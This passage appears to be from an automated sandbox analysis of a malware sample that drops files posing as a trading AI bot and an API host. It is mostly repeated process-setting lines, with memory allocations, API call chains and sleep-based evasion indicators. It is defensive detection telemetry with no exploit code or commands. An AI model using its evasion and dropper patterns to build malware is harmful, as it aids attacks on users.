                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeMemory allocated: 2180000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeMemory allocated: 2420000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 3300000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 6930000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2E930000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 47F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6232Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3427Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 5373Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 4418Jump to behavior
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-14092
                              Source: C:\Users\user\Desktop\F7Xu8bRnXT.exe TID: 5580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep count: 6232 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep count: 3427 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 6616Thread sleep time: -322380000s >= -30000sJump to behavior
